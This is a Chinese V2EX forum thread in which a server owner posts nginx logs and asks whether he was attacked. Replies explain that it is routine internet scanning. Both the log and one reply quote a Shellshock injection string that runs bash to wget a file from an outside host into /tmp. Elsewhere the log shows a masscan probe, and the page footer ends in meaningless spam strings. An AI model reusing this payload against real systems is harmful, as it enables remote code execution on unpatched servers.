昨晚服务器貌似被攻击了,大神们来看看! - V2EX
V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
Distributions
Ubuntu
Fedora
CentOS
中文资源站
网易开源镜像站
justlikemaki
V2EX    Linux

昨晚服务器貌似被攻击了,大神们来看看!

  •  
  •   justlikemaki 2015-07-01 11:58:36 +08:00 5429 次点击
    这是一个创建于 3758 天前的主题,其中的信息可能已经有所发展或是发生改变。

    这些是异常的访问请求:

    2015/06/30 15:12:29 [error] 2926#0: *22 open() "/var/www/clientaccesspolicy.xml" failed (2: No such file or directory), client: 54.80.128.131, server: _, request: "GET /clientaccesspolicy.xml HTTP/1.1", host: "167.160.165.36"

    54.80.128.131 - - [30/Jun/2015:15:12:29 -0400] "HEAD / HTTP/1.1" 200 0 "-" "Cloud mapping experiment. Contact [email protected]"

    220.181.132.218 - - [30/Jun/2015:16:05:11 -0400] "GET / HTTP/1.1" 200 151 "http://xxxxxxxxx(隐藏一下)/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Tablet PC 2.0)"

    101.199.112.54 - - [30/Jun/2015:16:06:40 -0400] "GET / HTTP/1.1" 200 151 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36"

    220.181.132.200 - - [30/Jun/2015:16:08:09 -0400] "GET / HTTP/1.1" 200 151 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36"

    180.153.99.56 - - [30/Jun/2015:17:21:45 -0400] "-" 400 0 "-" "-"
    180.153.99.56 - - [30/Jun/2015:17:26:18 -0400] "GET / HTTP/1.0" 200 151 "() { :;}; /bin/bash -c \x22wget -O /tmp/bbb dprftp.asuscomm.com/novo.php?ip=3136372e3136302e3136352e3336\x22" "() { :;}; /bin/bash -c \x22wget -O /tmp/bbb dprftp.asuscomm.com/novo.php?ip=3136372e3136302e3136352e3336\x22"


    61.240.144.64 - - [30/Jun/2015:23:57:28 -0400] "GET / HTTP/1.0" 200 151 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"

    这是哪位河北的大神留下的啊??????

    17 条回复    2015-07-02 10:29:38 +08:00
    realpg
        1
    realpg  
    PRO
       2015-07-01 13:10:08 +08:00
    鉴定:没被攻击
    PS 第二条真聪明,利用日志做广告……
    我也学会了,下次用这种方式发简历求职好了……
    RIcter
        2
    RIcter  
       2015-07-01 13:18:44 +08:00 via iPhone
    描 shellshock 碰巧到你了,又什大事
    justlikemaki
        3
    justlikemaki  
    OP
       2015-07-01 15:00:25 +08:00
    @realpg () { :;}; /bin/bash -c \x22wget -O /tmp/bbb dprftp.asuscomm.com/novo.php?ip=3136372e3136302e3136352e3336\x22
    搞不懂这个是干嘛的。。。
    reb00ts
        4
    reb00ts  
       2015-07-01 15:15:10 +08:00
    莫慌,跑在外网的机器,被扫扫很正常
    lhbc
        5
    lhbc  
       2015-07-01 15:20:38 +08:00 via iPhone
    @justlikemaki 扫漏洞,好像是之前的libc漏洞。
    knightdf
        6
    knightdf  
       2015-07-01 16:01:14 +08:00
    这也叫被攻击啊?随便扫了扫你的服务器而已
    DearTanker
        7
    DearTanker  
       2015-07-01 16:21:16 +08:00
    @lhbc
    @knightdf

    楼上2位,好巧?
    realpg
        8
    realpg  
    PRO
       2015-07-01 17:41:50 +08:00
    @knightdf 你这个头像的大图有么?用beastie做头像N年,发现这个更合适……
    ysjdx
        9
    ysjdx  
       2015-07-01 20:01:42 +08:00
    @justlikemaki bash漏洞
    MrDream
        11
    MrDream  
       2015-07-01 21:17:03 +08:00
    @popok 大宝?
    zscself
        12
    zscself  
       2015-07-01 22:15:17 +08:00   1
    popok
        13
    popok  
       2015-07-01 22:20:45 +08:00
    @MrDream 什么?
    bios12567496
        14
    bios12567496  
       2015-07-01 22:58:40 +08:00
    @MrDream 哈哈 以为对方是猴大宝了吧?
    knightdf
        15
    knightdf  
       2015-07-01 23:04:06 +08:00
    @realpg 有啊
    MrDream
        16
    MrDream  
       2015-07-02 10:29:21 +08:00 via Android
    @popok 你头像和另一微博红人的很像。
    MrDream
        17
    MrDream  
       2015-07-02 10:29:38 +08:00 via Android
    @bios12567496 是的 :)
    关于     帮助文档     自助推广系统     博客     API     FAQ     Solana     954 人在线   最高记录 6679       Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 26ms UTC 19:29 PVG 03:29 LAX 12:29 JFK 15:29
    Do have faith in what you're doing.
    ubao snddm index pchome yahoo rakuten mypaper meadowduck bidyahoo youbao zxmzxm asda bnvcg cvbfg dfscv mmhjk xxddc yybgb zznbn ccubao uaitu acv GXCV ET GDG YH FG BCVB FJFH CBRE CBC GDG ET54 WRWR RWER WREW WRWER RWER SDG EW SF DSFSF fbbs ubao fhd dfg ewr dg df ewwr ewwr et ruyut utut dfg fgd gdfgt etg dfgt dfgd ert4 gd fgg wr 235 wer3 we vsdf sdf gdf ert xcv sdf rwer hfd dfg cvb rwf afb dfh jgh bmn lgh rty gfds cxv xcv xcs vdas fdf fgd cv sdf tert sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf shasha9178 shasha9178 shasha9178 shasha9178 shasha9178 liflif2 liflif2 liflif2 liflif2 liflif2 liblib3 liblib3 liblib3 liblib3 liblib3 zhazha444 zhazha444 zhazha444 zhazha444 zhazha444 dende5 dende denden denden2 denden21 fenfen9 fenf619 fen619 fenfe9 fe619 sdf sdf sdf sdf sdf zhazh90 zhazh0 zhaa50 zha90 zh590 zho zhoz zhozh zhozho zhozho2 lislis lls95 lili95 lils5 liss9 sdf0ty987 sdft876 sdft9876 sdf09876 sd0t9876 sdf0ty98 sdf0976 sdf0ty986 sdf0ty96 sdf0t76 sdf0876 df0ty98 sf0t876 sd0ty76 sdy76 sdf76 sdf0t76 sdf0ty9 sdf0ty98 sdf0ty987 sdf0ty98 sdf6676 sdf876 sd876 sd876 sdf6 sdf6 sdf9876 sdf0t sdf06 sdf0ty9776 sdf0ty9776 sdf0ty76 sdf8876 sdf0t sd6 sdf06 s688876 sd688 sdf86